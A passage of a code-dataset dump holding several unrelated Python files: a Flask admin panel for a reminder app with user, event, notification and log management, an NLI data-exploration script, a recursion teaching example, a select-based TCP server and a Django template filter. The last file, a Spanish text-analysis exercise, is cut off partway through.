\"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\t{6}\\t{7}\\t{8}\\t{9}\\t{10}\\t{11}\\t{12}\\t{13}\\t{14}\\t{15}\".format(\n i,\n item['promptID'],\n item['pairID'],\n item['genre'],\n item['sentence1_binary_parse'],\n item['sentence2_binary_parse'],\n item['sentence1_parse'],\n item['sentence2_parse'],\n item['sentence1'],\n item['sentence2'],\n None,\n None,\n None,\n None,\n None,\n item['gold_label'])\n\n f.write(s + \"\\n\")\n\n####################################################################\n# MNLI data\nmultinli_labels_train = pd.Series(\n [ex.gold_label for ex in nli.MultiNLITrainReader(\n MULTINLI_HOME, filter_unlabeled=False).read()])\n\nmultinli_labels_train.value_counts()\n\nmultinli_labels_dev = pd.Series(\n [ex.gold_label for ex in nli.MultiNLIMatchedDevReader(\n MULTINLI_HOME, filter_unlabeled=True).read()])\n\nmultinli_labels_dev.value_counts()\n\nnli.MultiNLIMatchedDevReader(MULTINLI_HOME, filter_unlabeled=True).read()\n\nfor line in open(os.path.join(MULTINLI_HOME, \"multinli_1.0_dev_matched.jsonl\"), encoding='utf8'):\n d = json.loads(line)\n break\n\n# ANLI data\nfor r in (1,2,3):\n anli_labels_dev = pd.Series(\n [ex.label == ex.model_label for ex in nli.ANLIDevReader(ANLI_HOME, rounds=(r,)).read()]\n ).value_counts()\n\n print(anli_labels_dev)\n\n anli_labels_dev = pd.Series(\n [ex.label for ex in nli.ANLIDevReader(ANLI_HOME, rounds=(r,)).read()]\n ).value_counts()\n\n print(anli_labels_dev)\n\n print(\"-----------------\")\n\n#####################################################################\n\n\n\n","sub_path":"_project_trials1_1_eda_anli.py","file_name":"_project_trials1_1_eda_anli.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"202890371","text":"import datetime\nimport json\nimport time\n\nfrom flask import Blueprint, render_template, request, redirect, url_for, flash, abort, current_app, session\nfrom flask_login import current_user\nfrom sqlalchemy import func, desc, asc\nimport requests\nimport elasticsearch.exceptions\n\nfrom reminder.extensions import db, scheduler, cache\nfrom reminder.models import Role, User, Event, Notification, Log\nfrom reminder.main import views as main_views\nfrom reminder.admin import smtp_mail\nfrom reminder.custom_decorators import admin_required, login_required, cancel_click\nfrom reminder.admin.forms import NewUserForm, EditUserForm, NotifyForm\nfrom reminder.custom_wtforms import flash_errors\n\n\nadmin_bp = Blueprint('admin_bp', __name__,\n template_folder='templates',\n static_folder='static')\n\n\n@admin_bp.before_app_first_request\ndef before_app_req():\n \"\"\"\n Refresh an index inside elasticsearch with all the data from the relational side and cash mail config.\n \"\"\"\n # Add all the events and logs from the db to the search index.\n Event.reindex()\n Log.reindex()\n # Caching mail server config - in order to allow the admin to change the configuration\n # while the application is running (store mail config data in db is not desired)\n cache.set_many({'mail_server': current_app.config.get('MAIL_SERVER'),\n 'mail_port': current_app.config.get('MAIL_PORT'),\n 'mail_security': current_app.config.get('MAIL_SECURITY'),\n 'mail_username': current_app.config.get('MAIL_DEFAULT_SENDER'),\n 'mail_password': current_app.config.get('MAIL_PASSWORD'),})\n # cache.clear()\n\n\n@admin_bp.before_request\ndef update_last_seen():\n \"\"\"\n Update when the current user was last seen (User.last_seen attribute).\n \"\"\"\n if current_user.is_authenticated:\n current_user.user_seen()\n db.session.commit()\n\n\ndef background_job():\n \"\"\"\n Run process in background.\n \"\"\"\n with scheduler.app.app_context():\n today = datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H:%M\")\n # only for tests\n # print(today) # only for tests\n events_to_notify = Event.query.filter(Event.time_notify <= today,\n Event.is_active == True,\n Event.to_notify == True,\n Event.notification_sent == False).all()\n try:\n for event in events_to_notify:\n users_to_notify = [user for user in event.notified_users]\n if not users_to_notify:\n continue\n users_notified = smtp_mail.send_email('Attention! Upcoming event!',\n users_to_notify,\n event,\n cache.get('mail_server'),\n cache.get('mail_port'),\n cache.get('mail_security'),\n cache.get('mail_username'),\n cache.get('mail_password'))\n current_app.logger_admin.info(f'Notification service: notification has been sent to: {users_notified}')\n # only for test\n # print(f'Mail sent to {users_notified}')\n event.notification_sent = True\n db.session.commit()\n except Exception as error:\n current_app.logger_admin.error(f'Background job error: {error}')\n # Remove job when error occure.\n scheduler.remove_job('my_job_id')\n\n\n@admin_bp.route('/events')\n@login_required\n@admin_required\ndef events():\n \"\"\"\n Display all events from db in Admin Portal.\n \"\"\"\n # Pagination\n events_per_page = 10\n page = request.args.get('page', 1, type=int)\n\n if not request.args or (request.args.get('col') == 'start' and request.args.get('dir') == 'asc'):\n events = Event.query.order_by(\"time_event_start\").paginate(page, events_per_page, True)\n elif request.args.get('col') == 'id' and request.args.get('dir') == 'desc':\n events = Event.query.order_by(desc(Event.id)).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'id' and request.args.get('dir') == 'asc':\n events = Event.query.order_by(asc(Event.id)).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'start' and request.args.get('dir') == 'desc':\n events = Event.query.order_by(desc(Event.time_event_start)).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'start' and request.args.get('dir') == 'asc':\n events = Event.query.order_by(asc(Event.time_event_start)).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'stop' and request.args.get('dir') == 'desc':\n events = Event.query.order_by(desc(Event.time_event_stop)).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'stop' and request.args.get('dir') == 'asc':\n events = Event.query.order_by(asc(Event.time_event_stop)).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'title' and request.args.get('dir') == 'asc':\n events = Event.query.order_by(func.lower(Event.title).asc()).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'title' and request.args.get('dir') == 'desc':\n events = Event.query.order_by(func.lower(Event.title).desc()).paginate(page, events_per_page, True)\n elif request.args.get('col') == 'notify' and request.args.get('dir') == 'yes':\n events = Event.query.filter(Event.to_notify == True).order_by(\"time_event_start\")\\\n .paginate(page, events_per_page, True)\n elif request.args.get('col') == 'notify' and request.args.get('dir') == 'no':\n events = Event.query.filter(Event.to_notify == False).order_by(\"time_event_start\")\\\n .paginate(page, events_per_page, True)\n elif request.args.get('col') == 'active' and request.args.get('dir') == 'no':\n events = Event.query.filter(Event.is_active == False).order_by(\"time_event_start\")\\\n .paginate(page, events_per_page, True)\n elif request.args.get('col') == 'active' and request.args.get('dir') == 'yes':\n events = Event.query.filter(Event.is_active == True).order_by(\"time_event_start\")\\\n .paginate(page, events_per_page, True)\n else:\n abort(404)\n # Remember additional URL in session, if last event on page - for event deleting feature\n if session.get('prev_endpoint_del'):\n del session['prev_endpoint_del']\n if len(events.items) == 1 and not page == 1:\n session['prev_endpoint_del'] = url_for('admin_bp.events',\n col=request.args.get('col'),\n dir=request.args.get('dir'),\n page=page - 1)\n # Remember current url in session (for back-redirect)\n if not request.args:\n session['prev_endpoint'] = url_for('admin_bp.events')\n else:\n session['prev_endpoint'] = url_for('admin_bp.events',\n col=request.args.get('col'),\n dir=request.args.get('dir'),\n page=page)\n # URLs for pagination navigation\n next_url = url_for('admin_bp.events',\n col=request.args.get('col', 'start'),\n dir=request.args.get('dir', 'asc'),\n page=events.next_num) if events.has_next else None\n prev_url = url_for('admin_bp.events',\n col=request.args.get('col', 'start'),\n dir=request.args.get('dir', 'asc'),\n page=events.prev_num) if events.has_prev else None\n return render_template('admin/events.html',\n events=events,\n title='Events', next_url=next_url,\n prev_url=prev_url,\n events_per_page=events_per_page)\n\n\n@admin_bp.route('/event/', methods=['GET', 'POST'])\n@cancel_click()\n@login_required\n@admin_required\ndef event(event_id):\n \"\"\"\n Display particular event's details.\n The event details in Admin Portal.\n \"\"\"\n event = Event.query.filter_by(id=event_id).first_or_404()\n # Fetch users that can be notified (only with user role)\n users_to_notify = User.get_all_standard_users()\n today = datetime.date.today().strftime(\"%Y-%m-%d\")\n if request.method == \"POST\":\n event.title = request.form.get('title')\n event.details = request.form.get('details')\n event.all_day_event = True if request.form.get('allday') == 'True' else False\n event.to_notify = True if request.form.get('to_notify') == 'True' else False\n if request.form.get('date_notify'):\n event.time_notify = main_views.str_to_datetime(request.form.get('date_notify'),\n request.form.get('time_notify'))\n else:\n event.time_notify = None\n event.notification_sent = True if request.form.get('notify_sent') == 'True' else False\n # Check if event ia all_day event or not.\n if request.form.get('time_event_start'):\n time_event_start_db = main_views.str_to_datetime(request.form.get('date_event_start'),\n request.form.get('time_event_start'))\n time_event_stop_db = main_views.str_to_datetime(request.form.get('date_event_stop'),\n request.form.get('time_event_stop'))\n else:\n time_event_start_db = main_views.str_to_datetime(request.form.get('date_event_start'))\n time_event_stop_db = main_views.str_to_datetime(request.form.get('date_event_stop'))\n event.time_event_start = time_event_start_db\n event.time_event_stop = time_event_stop_db\n # Set users to notify. If \"to_notify = False\" the list \"user_form\" is []\n users_form = request.form.getlist('notified_user')\n # Overwrite current users to notify.\n event.notified_users = [User.query.get(user_id) for user_id in users_form]\n db.session.commit()\n flash('Your changes have been saved!', 'success')\n if 'prev_endpoint' in session:\n return redirect(session['prev_endpoint'])\n return redirect(url_for('admin_bp.events'))\n return render_template('admin/event.html', event=event, title='Event details', users=users_to_notify, today=today)\n\n\n@admin_bp.route('/users')\n@login_required\n@admin_required\ndef users():\n \"\"\"\n List user's data from db in Admin Portal.\n \"\"\"\n # Pagination\n users_per_page = 10\n page = request.args.get('page', 1, type=int)\n # Remember current url in session (for back-redirect)\n session['prev_endpoint'] = url_for('admin_bp.users',\n page=request.args.get('page'))\n users = User.query.order_by(func.lower(User.username).asc()).paginate(page, users_per_page, True)\n # URLs for pagination navigation\n next_url = url_for('admin_bp.users',\n page=users.next_num) if users.has_next else None\n prev_url = url_for('admin_bp.users',\n page=users.prev_num) if users.has_prev else None\n\n return render_template('admin/users.html',\n users=users,\n title='Users',\n prev_url=prev_url,\n next_url=next_url,\n users_per_page=users_per_page)\n\n\ndef check_user_exist(request, user_edited=None):\n \"\"\"\n Check if username and email already exist in db.\n \"\"\"\n username_from_form = request.form.get('username')\n email_from_form = request.form.get('email')\n user_exist, email_exist = None, None\n if user_edited:\n # When the user is edited\n if user_edited.username != username_from_form:\n user_exist = User.query.filter_by(username=username_from_form).first()\n if user_edited.email != email_from_form:\n email_exist = User.query.filter_by(email=email_from_form).first()\n else:\n # When a new user is created\n user_exist = User.query.filter_by(username=username_from_form).first()\n email_exist = User.query.filter_by(email=email_from_form).first()\n if user_exist or email_exist:\n access_from_form = True if request.form.get('access') == 'True' else False\n roleid_from_form = request.form.get('role')\n pass_reset_from_form = True if request.form.get('pass_reset') == 'True' else False\n form_content = {\n 'username': username_from_form,\n 'email': email_from_form,\n 'access': access_from_form,\n 'roleid': True if roleid_from_form == 'admin' else False,\n 'pass_reset': pass_reset_from_form,\n }\n if user_exist and email_exist:\n flash(f'Sorry! Username \"{username_from_form}\" and email \"{email_from_form}\" are already taken. '\n f'Please try something different.', 'danger')\n elif email_exist:\n flash(f'Sorry! Email \"{email_from_form}\" is already taken. Please try something different.', 'danger')\n else:\n flash(f'Sorry! Username \"{username_from_form}\" is already taken. Please try something different.', 'danger')\n return form_content\n\n\n@admin_bp.route('/new_user', methods=['GET', 'POST'])\n@cancel_click('admin_bp.users')\n@login_required\n@admin_required\ndef new_user():\n \"\"\"\n Add new user to db.\n \"\"\"\n if request.method == \"POST\":\n form = NewUserForm()\n # Validate form data on server-side\n if form.validate_on_submit():\n # Check if username and email already exist in db.\n user_exist = check_user_exist(request)\n if user_exist:\n return render_template('admin/new_user.html', title='New user', form_prev_input=form)\n username_form = request.form.get('username')\n email_form = request.form.get('email')\n password_form = request.form.get('password')\n user = User(username=username_form,\n email=email_form,\n access_granted=True if request.form.get('access') == 'True' else False,\n pass_change_req=True if request.form.get('pass_reset') == 'True' else False,\n role_id=str(Role.query.filter_by(name=request.form.get('role')).first().id))\n user.set_password(password_form)\n db.session.add(user)\n db.session.commit()\n current_app.logger_admin.info(f'User \"{user.username}\" has been added to db')\n flash(f'User \"{user.username}\" has been added!', 'success')\n return redirect(url_for('admin_bp.users'))\n if form.errors:\n flash_errors(form)\n # Render previous user input in form fields\n return render_template('admin/new_user.html', title='New user', form_prev_input=form)\n return render_template('admin/new_user.html', title='New user')\n\n\n@admin_bp.route('/user/', methods=['GET', 'POST'])\n@cancel_click()\n@login_required\n@admin_required\ndef user(user_id):\n \"\"\"\n Editing an user already existing in the db.\n \"\"\"\n user = User.query.filter_by(id=user_id).first_or_404()\n if request.method == \"POST\":\n form = EditUserForm()\n # Validate form data on server-side\n if form.validate_on_submit():\n # Check if new assigned username or email exist in db.\n user_exist = check_user_exist(request, user)\n if user_exist:\n return render_template('admin/user.html', form_prev_input=form)\n username_form = request.form.get('username')\n email_form = request.form.get('email')\n password_form = request.form.get('password')\n user.username = username_form\n user.email = email_form\n if request.form.get('access') == 'True' and str(user.access_granted) != request.form.get('access'):\n user.failed_login_attempts = 0\n user.access_granted = True if request.form.get('access') == 'True' else False\n user.pass_change_req = True if request.form.get('pass_reset') == 'True' else False\n user.role_id = str(Role.query.filter_by(name=request.form.get('role')).first().id)\n # Check whether password has been changed\n if password_form and not user.check_password(password_form):\n user.set_password(password_form)\n db.session.commit()\n current_app.logger_admin.info(f'User \"{user.username}\" data has been changed')\n flash('Your changes have been saved!', 'success')\n return redirect(url_for('admin_bp.users'))\n if form.errors:\n flash_errors(form)\n # Render previous user input in form fields\n return render_template('admin/user.html', form_prev_input=form)\n return render_template('admin/user.html', user=user)\n\n\n@admin_bp.route('/del_user/')\n@login_required\n@admin_required\ndef del_user(user_id):\n \"\"\"\n Delete user data in db.\n \"\"\"\n if current_user.id == user_id:\n flash(\"Sorry! You can't delete yourself!\", 'danger')\n return redirect(url_for('admin_bp.users'))\n user = User.query.filter_by(id=user_id).first()\n current_app.logger_admin.warning(f'User \"{user.username} has been deleted from db\"')\n db.session.delete(user)\n db.session.commit()\n flash(f'User \"{user.username}\" has been deleted!', 'success')\n if 'prev_endpoint' in session:\n return redirect(session['prev_endpoint'])\n return redirect(url_for('admin_bp.users'))\n\n\n@admin_bp.route('/del_event/')\n@login_required\n@admin_required\ndef del_event(event_id):\n \"\"\"\n Delete event data from db - permanent.\n \"\"\"\n event = Event.query.filter_by(id=event_id).first()\n db.session.delete(event)\n db.session.commit()\n flash(f'Event with title \"{event.title}\" has been permanently deleted!', 'success')\n # Custom small delay when deleting search results from db (for elasticsearch better performance)\n if 'search' in session.get('prev_endpoint'):\n time.sleep(1)\n if session.get('prev_endpoint_del'):\n return redirect(session.get('prev_endpoint_del'))\n elif session.get('prev_endpoint'):\n return redirect(session['prev_endpoint'])\n return redirect(url_for('admin_bp.events'))\n\n\n@admin_bp.route('/act_event/')\n@login_required\n@admin_required\ndef act_event(event_id):\n \"\"\"\n Activate the event to make it visible to standard users.\n \"\"\"\n event = Event.query.filter_by(id=event_id).first()\n if event.is_active:\n event.is_active = False\n db.session.commit()\n flash(f'Event with title \"{event.title}\" has been deactivated!', 'success')\n else:\n event.is_active = True\n db.session.commit()\n flash(f'Event with title \"{event.title}\" has been activated!', 'success')\n # Redirect to previous URL\n if 'prev_endpoint' in session:\n return redirect(session['prev_endpoint'])\n return redirect(url_for('admin_bp.events'))\n\n\n@admin_bp.route('/notify/', methods=['GET', 'POST'])\n@cancel_click('admin_bp.dashboard')\n@login_required\n@admin_required\ndef notify():\n \"\"\"\n Func allows to start notification service and change the service configuration.\n \"\"\"\n # only for test\n # print(scheduler.get_jobs(jobstore='default'))\n # Get mail config from cache\n mail_config_cache = cache.get_dict('mail_server',\n 'mail_port',\n 'mail_security',\n 'mail_username',\n 'mail_password')\n # Notification config data (for interval and interval unit).\n notification_config = Notification.query.first()\n # Mail config data.\n notify_config = mail_config_cache.copy()\n notify_config['notify_unit'] = notification_config.notify_unit\n notify_config['notify_interval'] = notification_config.notify_interval\n if request.method == \"POST\":\n form = NotifyForm()\n # Validate form data on server-side\n if form.validate_on_submit():\n # Fetch data from form.\n notify_status_form = request.form.get('notify_status')\n notify_unit_form = request.form.get('notify_unit')\n notify_interval_form = int(request.form.get('notify_interval'))\n # Checks whether the data provided in the form differs from those stored in the cache\n # and update the data in 'notify_config' div and config object (if required).\n config_changed = False\n for key, val in notify_config.items():\n if key in form.data.keys() and key in mail_config_cache.keys():\n if notify_config[key] != str(form.data[key]) and str(form.data[key]) != '':\n cache.set(key, str(form.data[key]))\n notify_config[key] = str(form.data[key])\n config_changed = True\n # print(key, form.data[key])\n # Checks whether the data provided in the form differs from those stored in the db\n if notify_unit_form != notify_config['notify_unit'] or \\\n notify_interval_form != notify_config['notify_interval']:\n notification_config.notify_unit = notify_unit_form\n notification_config.notify_interval = notify_interval_form\n db.session.commit()\n # Update the rest of the data in 'notify_config' dic.\n notify_config['notify_unit'] = notify_unit_form\n notify_config['notify_interval'] = notify_interval_form\n config_changed = True\n # Test mail configuration before running service\n if notify_status_form == 'on':\n test_mail_config = smtp_mail.test_email(notify_config['mail_server'],\n notify_config['mail_port'],\n notify_config['mail_security'],\n notify_config['mail_username'],\n notify_config['mail_password'])\n else:\n test_mail_config = False\n # Notification service engine\n if not notify_status_form and scheduler.get_jobs():\n scheduler.remove_job('my_job_id')\n current_app.logger_admin.info(f'Notification service has been turned off by \"{current_user.username}\"')\n flash('The notify service has been turned off!', 'success')\n elif scheduler.get_jobs() and not test_mail_config:\n scheduler.remove_job('my_job_id')\n elif notify_status_form == 'on' and test_mail_config:\n if not scheduler.get_jobs():\n current_app.logger_admin.info(f'Notification service has been started by \"{current_user.username}\"')\n else:\n current_app.logger_admin.info(f'Notification service config has been changed by '\n f'\"{current_user.username}\"')\n if notify_unit_form == 'seconds':\n scheduler.add_job(func=background_job, trigger='interval', replace_existing=True, max_instances=1,\n seconds=notify_interval_form, id='my_job_id')\n elif notify_unit_form == 'minutes':\n scheduler.add_job(func=background_job, trigger='interval', replace_existing=True, max_instances=1,\n minutes=notify_interval_form, id='my_job_id')\n else:\n scheduler.add_job(func=background_job, trigger='interval', replace_existing=True, max_instances=1,\n hours=notify_interval_form, id='my_job_id')\n flash('Connection with mail server established correctly! The notify service is running!', 'success')\n # Flash msg when config has been changed by user\n if not scheduler.get_jobs() and config_changed:\n current_app.logger_admin.info(f'Notification service config has been changed by '\n f'\"{current_user.username}\"')\n flash('The notification service config has been changed!', 'success')\n if form.errors:\n flash_errors(form)\n # Determine weather some scheduler jobs exist - if True, notification service is running\n service_run = True if scheduler.get_jobs() else False\n return render_template('admin/notify.html', service_run=service_run, **notify_config)\n\n\n@admin_bp.route('/logs')\n@login_required\n@admin_required\ndef logs():\n \"\"\"\n List app's logs.\n \"\"\"\n logs_per_page = 12\n page = request.args.get('page', 1, type=int)\n if not request.args or (request.args.get('col') == 'time' and request.args.get('dir') == 'desc'):\n logs = Log.query.order_by(desc(Log.time)).paginate(page, logs_per_page, True)\n elif request.args.get('col') == 'time' and request.args.get('dir') == 'desc':\n logs = Log.query.order_by(desc(Log.time)).paginate(page, logs_per_page, True)\n elif request.args.get('col') == 'time' and request.args.get('dir') == 'asc':\n logs = Log.query.order_by(asc(Log.time)).paginate(page, logs_per_page, True)\n elif request.args.get('col') == 'log_name' and request.args.get('dir') == 'desc':\n logs = Log.query.order_by(desc(Log.log_name)).paginate(page, logs_per_page, True)\n elif request.args.get('col') == 'log_name' and request.args.get('dir') == 'asc':\n logs = Log.query.order_by(asc(Log.log_name)).paginate(page, logs_per_page, True)\n elif request.args.get('col') == 'level' and request.args.get('dir') == 'asc':\n logs = Log.query.order_by(asc(Log.level)).paginate(page, logs_per_page, True)\n elif request.args.get('col') == 'level' and request.args.get('dir') == 'desc':\n logs = Log.query.order_by(desc(Log.level)).paginate(page, logs_per_page, True)\n else:\n abort(404)\n if not request.args:\n session['prev_endpoint'] = url_for('admin_bp.logs')\n else:\n session['prev_endpoint'] = url_for('admin_bp.logs',\n col=request.args.get('col'),\n page=page)\n next_url = url_for('admin_bp.logs',\n col=request.args.get('col', 'time'),\n dir=request.args.get('dir', 'desc'),\n page=logs.next_num) if logs.has_next else None\n prev_url = url_for('admin_bp.logs',\n col=request.args.get('col', 'time'),\n dir=request.args.get('dir', 'desc'),\n page=logs.prev_num) if logs.has_prev else None\n return render_template('admin/logs.html',\n logs=logs,\n next_url=next_url,\n prev_url=prev_url,\n logs_per_page=logs_per_page)\n\n\n@admin_bp.route('/logs_clear')\n@login_required\n@admin_required\ndef logs_clear():\n \"\"\"\n Clear app's logs.\n \"\"\"\n if request.args.get('range') == 'all':\n db.session.query(Log).delete()\n db.session.commit()\n elif request.args.get('range') == 'day1':\n Log.delete_expired(1)\n elif request.args.get('range') == 'week1':\n Log.delete_expired(7)\n elif request.args.get('range') == 'week2':\n Log.delete_expired(14)\n elif request.args.get('range') == 'month1':\n Log.delete_expired(31)\n elif request.args.get('range') == 'month3':\n Log.delete_expired(90)\n else:\n abort(404)\n flash('Logs from the selected timeframe have been deleted!', 'success')\n return redirect(url_for('admin_bp.logs'))\n\n\n@admin_bp.route('/search_engine', methods=['GET', 'POST'])\n@cancel_click('admin_bp.dashboard')\n@login_required\n@admin_required\ndef search_engine():\n \"\"\"\n View shows search engine's status and config in admin dashboard.\n \"\"\"\n search_service_status = False if not current_app.elasticsearch or not current_app.elasticsearch.ping() else True\n search_url = current_app.config.get('ELASTICSEARCH_URL')\n # Get elasticsearch node info\n search_config_data = {}\n if search_service_status:\n response = requests.get(search_url)\n search_config_data = json.loads(response.text)\n if search_config_data.get('version'):\n search_service_version = search_config_data.get('version').get('number', 'No data')\n search_service_build_type = search_config_data.get('version').get('build_type', 'No data')\n else:\n search_service_version = search_config_data.get('version', 'No data')\n search_service_build_type = search_config_data.get('version', 'No data')\n search_config = {\n 'search_url': search_url,\n 'search_service_status': search_service_status,\n 'search_service_version': search_service_version,\n 'search_service_build_type': search_service_build_type,\n }\n if request.method == \"POST\":\n # Reindex on demand - add all events and logs from the db to the search index in elasticsearch.\n Event.reindex()\n Log.reindex()\n flash(f'Data from database have been reindexed!', 'success')\n return render_template('admin/search_engine.html', **search_config)\n\n\n@admin_bp.route('/search')\n@login_required\n@admin_required\ndef search():\n \"\"\"\n Search engine for admin blueprint.\n \"\"\"\n if not current_app.elasticsearch or not current_app.elasticsearch.ping():\n flash(f'Sorry! No connection with search engine!', 'danger')\n return redirect(session.get('prev_endpoint'))\n # Fetch all current event's authors from db.\n page = request.args.get('page', 1, type=int)\n items_per_page = 10\n try:\n if request.args.get('sub') == 'events':\n events, total = Event.search(request.args.get('q'), page, items_per_page)\n items_on_current_page = events.count()\n elif request.args.get('sub') == 'logs':\n logs, total = Log.search(request.args.get('q'), page, items_per_page)\n items_on_current_page = logs.count()\n else:\n abort(404)\n except (elasticsearch.exceptions.RequestError, TypeError):\n abort(404)\n next_url = url_for('admin_bp.search', sub=request.args.get('sub'), q=request.args.get('q'), page=page + 1) \\\n if total > page * items_per_page else None\n prev_url = url_for('admin_bp.search', sub=request.args.get('sub'), q=request.args.get('q'), page=page - 1) \\\n if page > 1 else None\n # Pagination for search results\n page_last = int(total / items_per_page) + 1 if (total / items_per_page % 1) != 0 else int(total / items_per_page)\n pagination = {\n 'page_first': 1,\n 'page_current': page,\n 'page_last': page_last,\n 'page_prev': page - 1 if page > 1 else None,\n 'page_next': page + 1 if total > page * items_per_page else None,\n 'items_per_page': items_per_page,\n }\n # Remember additional URL in session, if there is only one event on page - for event deactivation feature\n if session.get('prev_endpoint_del'):\n del session['prev_endpoint_del']\n if items_on_current_page == 1 and not page == 1:\n session['prev_endpoint_del'] = url_for('admin_bp.search',\n sub=request.args.get('sub'),\n q=request.args.get('q'),\n page=page - 1)\n # Remember current url in session (for back-redirect)\n if not request.args.get('page'):\n session['prev_endpoint'] = url_for('admin_bp.search',\n sub=request.args.get('sub'),\n q=request.args.get('q'))\n else:\n session['prev_endpoint'] = url_for('admin_bp.search',\n sub=request.args.get('sub'),\n q=request.args.get('q'),\n page=request.args.get('page'))\n if request.args.get('sub') == 'events':\n return render_template('admin/search.html',\n title='Search',\n events=events,\n total=total,\n next_url=next_url,\n prev_url=prev_url,\n **pagination)\n elif request.args.get('sub') == 'logs':\n return render_template('admin/search.html',\n title='Search',\n logs=logs,\n total=total,\n next_url=next_url,\n prev_url=prev_url,\n **pagination)\n\n\n@admin_bp.route('/dashboard')\n@login_required\n@admin_required\ndef dashboard():\n # Data fetched from db\n users_count = User.query.count()\n standard_users_count = User.query.filter(User.role_id == 2).count()\n admin_users_count = User.query.filter(User.role_id == 1).count()\n events_active = Event.query.filter(Event.is_active == True).count()\n events_notactive = Event.query.filter(Event.is_active == False).count()\n events_count = Event.query.count()\n # Data for chart - 'Events created in last 30 days'\n today = datetime.datetime.today()\n events = Event.query.with_entities(Event.time_creation).filter(Event.time_creation <= today,\n Event.time_creation >= today - datetime.timedelta(days=31)).order_by('time_creation').all()\n event_dates = [event[0].date() for event in events]\n chart_data = {}\n for day in event_dates:\n new = chart_data.get(day, 0)\n chart_data[day] = new + 1\n events_labels = chart_data.keys()\n events_values = chart_data.values()\n\n if not current_app.elasticsearch or not current_app.elasticsearch.ping():\n search_status = False\n else:\n search_status = True\n notification_status = True if scheduler.get_jobs() else False\n data = {\n 'users_count': users_count,\n 'standard_users_count': standard_users_count,\n 'admin_users_count': admin_users_count,\n 'events_count': events_count,\n 'search_status': search_status,\n 'notification_status': notification_status,\n 'events_active': events_active,\n 'events_notactive': events_notactive,\n 'events_labels': list(events_labels),\n 'events_values': list(events_values),\n }\n return render_template('admin/dashboard.html', **data)\n","sub_path":"reminder/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":35206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24651774","text":"#!/usr/bin/env python\n\n\"\"\"\nrecursion in an interactive loop\n\nThis code will work -- but not a great idea!\n\"\"\"\n\nimport sys\n\n\ndef mainloop():\n while True:\n ans = input('type \"a\", \"b\", or \"quit\"')\n if ans == \"a\":\n print(\"you typed a\")\n elif ans == \"b\":\n print(\"going to second loop\")\n second_loop()\n print(\"back from second loop\")\n elif ans[0] == \"q\":\n print(\"quitting\")\n # break\n sys.exit() # what if I use the break, rather than the exit()?\n elif ans[0] == \"r\": # here to test recursion...\n raise Exception()\n # else: # no expected response -- start the loop again\n # mainloop()\n\n\ndef second_loop():\n ans = \"\"\n while not ans == \"g\":\n ans = input('second loop: type \"a\", \"b\", or \"go back')\n if ans == \"a\":\n print(\"you typed a\")\n elif ans == \"b\":\n second_loop()\n # elif ans[0] == \"g\":\n # return\n # break\n # mainloop()\n\n\n\nif __name__ == \"__main__\":\n mainloop()\n\n\n\n\n\n","sub_path":"examples/Session04/recursive_mainloop.py","file_name":"recursive_mainloop.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"81248039","text":"\"\"\"\n基于select 的IO多路复用并发模型\n重点代码 !\n\"\"\"\nfrom socket import *\nfrom select import select\n\n# 全局变量\nHOST = \"0.0.0.0\"\nPORT = 8889\nADDR = (HOST,PORT)\n\n# 创建tcp套接字\ntcp_socket = socket()\ntcp_socket.bind(ADDR)\ntcp_socket.listen(5)\n\n# 设置为非阻塞\ntcp_socket.setblocking(False)\n\n# IO对象监控列表\nrlist = [tcp_socket] # 初始监听对象\nwlist = []\nxlist = []\n\n# 循环监听\nwhile True:\n # 对关注的IO进行监控\n rs,ws,xs = select(rlist,wlist,xlist)\n # 对返回值rs 分情况讨论 监听套接字 客户端连接套接字\n for r in rs:\n if r is tcp_socket:\n # 处理客户端连接\n connfd, addr = r.accept()\n print(\"Connect from\", addr)\n connfd.setblocking(False) # 设置非阻塞\n rlist.append(connfd) # 添加到监控列表\n else:\n # 收消息\n data = r.recv(1024)\n if not data:\n # 客户端退出\n rlist.remove(r) # 移除关注\n r.close()\n continue\n print(data.decode())\n # r.send(b'OK')\n wlist.append(r) # 放入写列表\n\n for w in ws:\n w.send(b\"OK\") # 发送消息\n wlist.remove(w) # 如果不移除会不断的写\n\n\n\n\n\n\n","sub_path":"month_02/teacher/day16/select_server.py","file_name":"select_server.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"114011301","text":"from django import template\nimport pprint\nfrom django.forms import ChoiceField\nregister = template.Library()\n\n@register.filter\ndef data_verbose(field):\n\t\"\"\"\n\tReturns field's data or it's verbose version \n\tfor a field with choices defined.\n\n\tUsage::\n\n\t\t{% load data_verbose %}\n\t\t{{form.some_field|data_verbose}}\n\t\"\"\"\n\tvalue = field.value()\n\tif isinstance(field.field, ChoiceField):\n\t\tfor (val, desc) in field.field.choices: \n\t\t\tif val == value: \n\t\t\t\treturn desc \n\t\n\treturn value","sub_path":"ewtisite/templatetags/data_verbose.py","file_name":"data_verbose.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"446943208","text":"__author__ = \"Alejo Herrera\"\n\nprint('Analisis de Texto')\nprint('=' * 80)\n\nvocales = 'aeiouAEIOU'\nclet = cpal = cpecv = palabras_li = palabras_menos_4 = 0\nemp_conso = tiene_li = False\ncar_ant = ''\ntexto = input('Ingrese el texto a analizar, separados por blancos y termina '\n 'en punto: ')\nfor caracter in texto:\n\n if caracter == ' ' or caracter == '.':\n if clet > 0:\n cpal += 1\n if emp_conso and car_ant in vocales:\n cpecv += 1\n emp_conso = False\n\n if tiene_li:\n palabras_li += 1\n tiene_li = False\n\n if clet < 4:\n palabras_menos_4 += 1\n clet = 0\n else:\n clet += 1\n if clet == 1:\n if 